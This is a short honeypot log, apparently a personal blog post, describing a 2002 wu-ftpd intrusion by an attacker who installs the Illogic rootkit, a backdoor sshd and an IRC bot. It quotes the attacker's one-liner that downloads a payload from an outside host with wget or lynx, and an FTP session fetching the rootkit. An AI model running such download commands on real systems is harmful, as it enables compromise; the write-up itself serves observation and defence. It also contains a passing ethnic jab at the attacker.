My honeypot

Smenutz

On November 9th, 2002 at 10:39:15, somebody came barging through my wu-ftpd's door. A file was fetched:

echo 1 ; if [ -f /usr/bin/wget ] ; then /usr/bin/wget http://diablows.org/gold.tgz ; else if [ -f /usr/bin/lynx ] ; then /usr/bin/lynx -dump http://diablows.org/gold.tgz >> gold.tgz ; fi ; fi ; fi

A few minutes later the same somebody came back and fetched a file called "rk.tar.gz" from a FTP-site:

ftp 209.171.43.x
linuxu
*censored*
bin
hash
prompt
cd www
ls
get rk.tar.gz
Name (209.171.43.x:root): Hash mark printing on (1024 bytes/hash mark).

With a simple "./setup password", the Illogic rootkit is installed. It creates backups of the sane versions of all kinds of binaries, copies trojanned versions of those binaries over the defaults, installs a sniffer, cleans logs and mails the system-configuration to a hotmail-account. A trojan sshd is also launched, as a backdoor.

A few minutes later the cracker logs in on his trojan sshd to fetch some more files. First he fetches "aw.tgz" from geocities. This file offers some FTP-scanning and exploiting tools. Not really interesting.

After scanning a /16 with "awu", the cracker goes onward to get a bot running on a IRC-network. It's a "Energy Mech" bot this time. He hooks it up with undernet to join a little channel of his and a trivia-channel. Apparantly the cracker is named "smenutz". He's a Romanian dude (ofcourse). He logs in on a freshly cracked system, unknowingly it's a honeypot, with PuTTy, a Windows SSH-client (and more). Fat change it's his homebox. Not much intelligence in this kiddie.

Since Smenutz needs to "pwn" more boxes, he starts scanning for wu-ftpd for a while. Although I limit such scans to a mere few bytes/s, they still annoy me. Since this kid only talks Romanian (which I do not understand) and doesn't seem to be all that interesting, I disconnect the system from the network.

This hack wasn't really exciting in any way. Although Smenutz does have some nice exploits for all kinds of services (sshd, telnetd, some ftpd's, rpc, openssl, etc), the old "crack_wuftpd, install_irc_bot, crack_other_wuftpds" has become boring, to me atleast. I'm wondering if there's a way to learn a lot and have fun at the same time with a honeypot..